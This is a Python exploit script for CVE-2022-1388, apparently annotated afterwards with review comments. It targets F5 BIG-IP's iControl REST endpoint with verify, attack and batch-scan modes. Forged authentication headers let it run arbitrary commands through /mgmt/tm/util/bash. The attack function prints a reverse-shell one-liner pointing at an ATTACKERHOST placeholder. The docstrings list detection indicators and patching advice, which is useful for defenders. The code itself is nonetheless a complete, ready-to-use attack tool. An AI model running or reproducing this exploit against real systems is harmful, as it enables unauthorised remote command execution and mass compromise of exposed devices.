CVE_2022_1388.py
#!/usr/bin/python3.9
# CVE 2022-1388 F5 Exploit
import requests
import sys
import argparse
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's InsecureRequestWarning. Every request in this file is sent
# with verify=False, so without this call each one would print a warning that
# the server certificate was not validated.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Unix timestamp captured once at import time. No other line visible in this
# listing reads `t`.
t = int(time.time())
# Colour Functions
def prRed(skk):
    """Print *skk* in bright red (ANSI SGR 91), then reset the colour."""
    coloured = "\033[91m {}\033[00m".format(skk)
    print(coloured)
def prGreen(skk):
    """Print *skk* in bright green (ANSI SGR 92), then reset the colour."""
    coloured = "\033[92m {}\033[00m".format(skk)
    print(coloured)
def prYellow(skk):
    """Print *skk* in bright yellow (ANSI SGR 93), then reset the colour."""
    coloured = "\033[93m {}\033[00m".format(skk)
    print(coloured)
def headers():
    """Return a fresh dict of the HTTP headers sent with every request.

    This header set is the request fingerprint of the CVE-2022-1388 traffic
    generated by this script, so it is the part of the file most useful for
    writing detections:

    * ``Connection`` names ``x-F5-Auth-Token`` next to ``keep-alive``.
    * ``X-F5-Auth-Token`` carries a one-character dummy value.
    * ``Authorization`` is HTTP Basic whose base64 payload decodes to
      ``admin:`` (user ``admin``, empty password).

    On the device side the fix is the vendor patch for CVE-2022-1388 and
    keeping the iControl REST management interface off untrusted networks.
    """
    return {
        # Static browser User-Agent. It is trivially changed, so it is only a
        # weak indicator on its own.
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36",
        'Content-Type': 'application/json',
        # A Connection header that lists X-F5-Auth-Token is the strongest
        # indicator in this request.
        'Connection': 'keep-alive, x-F5-Auth-Token',
        'X-F5-Auth-Token': 'a',
        # base64("admin:"): no password is supplied.
        'Authorization': 'Basic YWRtaW46',
    }
def check(target_url):
    """Probe one target and print whether it looks vulnerable.

    POSTs ``{'command': 'run', 'utilCmdArgs': '-c id'}`` to
    ``<target_url>/mgmt/tm/util/bash`` with the headers from ``headers()``.
    The target is reported as vulnerable when the reply is HTTP 200 and the
    body contains the text ``commandResult``.

    NOTE(review): this is an active probe. It asks the device to run ``id``
    rather than fingerprinting a version, so a positive result is itself a
    command execution on the target.
    NOTE(review): ``verify=False`` disables TLS certificate validation.
    NOTE(review): every exception is reduced to one generic message, so
    timeouts, DNS failures and TLS errors cannot be told apart in the output.
    """
    endpoint = target_url + '/mgmt/tm/util/bash'
    payload = {'command': "run", 'utilCmdArgs': "-c id"}
    try:
        response = requests.post(url=endpoint, json=payload, headers=headers(), verify=False, timeout=5)
        looks_vulnerable = response.status_code == 200 and 'commandResult' in response.text
        if looks_vulnerable:
            prGreen("[+] Target {} Vulnerable".format(target_url))
        else:
            prRed("[-] Target {} Not Vulnerable".format(target_url))
    except Exception:
        print('url access exception {0}'.format(target_url))
def attack(target_url, cmd):
    """Send *cmd* to the target's bash utility endpoint and print the output.

    Issues the same request as ``check`` but with ``utilCmdArgs`` set to
    ``-c '<cmd>'``. On HTTP 200 with ``commandResult`` in the body, the JSON
    reply is parsed and its ``commandResult`` field is printed.

    NOTE(review): *cmd* is placed between single quotes with no escaping, so
    a value that itself contains a single quote changes how the argument is
    parsed.
    NOTE(review): ``verify=False`` disables TLS certificate validation, and
    the broad ``except`` hides the cause of any failure, including a JSON
    parse error or a missing ``commandResult`` key.
    """
    endpoint = target_url + '/mgmt/tm/util/bash'
    payload = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
    try:
        response = requests.post(url=endpoint, json=payload, headers=headers(), verify=False, timeout=5)
        if not (response.status_code == 200 and 'commandResult' in response.text):
            prRed("[-] Target {} Not Vulnerable".format(target_url))
            return
        parsed = json.loads(response.text)
        output = parsed['commandResult']
        prGreen("[+] Target {} Vulnerable".format(target_url))
        # Operator hint printed by the original script; reproduced unchanged.
        print("suggested command for a reverse shell!: bash -i >&/dev/tcp/ATTACKERHOST/attackerport 0>&1")
        print('[+] Response:{0}'.format(output))
    except Exception:
        prYellow('url exception {0}'.format(target_url))
def scan(file):
    """Run ``check`` against every non-blank line of the text file *file*.

    Each line is stripped, normalised with ``format_url`` and probed in
    turn, one request at a time.

    NOTE(review): the file object returned by ``open`` is iterated directly
    and never explicitly closed.
    """
    for raw_line in open(file, 'r', encoding='utf-8'):
        entry = raw_line.strip()
        if entry == '':
            continue
        check(format_url(entry))
def format_url(url):
    """Return *url* with an ``https://`` scheme prepended when it has none.

    A value whose first four characters are ``http`` is kept as-is; anything
    else gets ``https://`` in front. Surrounding whitespace is stripped
    after the prefix decision, not before it. If any step raises, a yellow
    message is printed and the function returns ``None`` implicitly.
    """
    try:
        already_has_scheme = url[:4] == "http"
        candidate = url if already_has_scheme else "https://" + url
        return candidate.strip()
    except Exception:
        prYellow('URL Incorrect {0}'.format(url))
def main():
    """Parse the command line and dispatch to ``check``, ``attack`` or ``scan``.

    The first matching mode wins: ``-v`` with ``-u``; then ``-a`` with
    ``-u`` (``-c`` defaults to ``id``); then ``-s`` with ``-f``. If none
    matches, the process exits with status 0 and prints nothing further.

    NOTE(review): the mode flags use ``type=bool``. argparse applies
    ``bool()`` to the raw argument string, so any non-empty value, including
    the literal ``false``, parses as ``True``.
    NOTE(review): in the single-target modes the URL is passed on as given;
    only ``scan`` runs it through ``format_url``.
    """
    cli = argparse.ArgumentParser("F5 Big-IP RCE")
    cli.add_argument('-v', '--verify', type=bool, help=' check target is vulnerable ')
    cli.add_argument('-u', '--url', type=str, help=' TargetURL ')
    cli.add_argument('-a', '--attack', type=bool, help=' attack mode ')
    cli.add_argument('-c', '--command', type=str, default="id", help=' command to execute on remote host ')
    cli.add_argument('-s', '--scan', type=bool, help=' Batch Identification, supply a file with target hosts ')
    cli.add_argument('-f', '--file', type=str, help=' path to file containing target hosts')
    opts = cli.parse_args()

    have_url = opts.url is not None
    if opts.verify is True and have_url:
        check(opts.url)
    elif opts.attack is True and have_url and opts.command is not None:
        attack(opts.url, opts.command)
    elif opts.scan is True and opts.file is not None:
        scan(opts.file)
    else:
        sys.exit(0)
if __name__ == '__main__':
    # Usage banner, printed on every run before the arguments are parsed.
    # The first usage line spells the file name with hyphens while the other
    # two use underscores; the text is reproduced as the author wrote it.
    banner = '''
Y'all still exposing iControl endpoints?
Usage:
Test device: python3 CVE-2022-1388.py -v true -u target_url
Exploit device: python3 CVE_2022_1388.py -a true -u target_url -c command
Exploit List: python3 CVE_2022_1388.py -s true -f file
'''
    print(banner)
    main()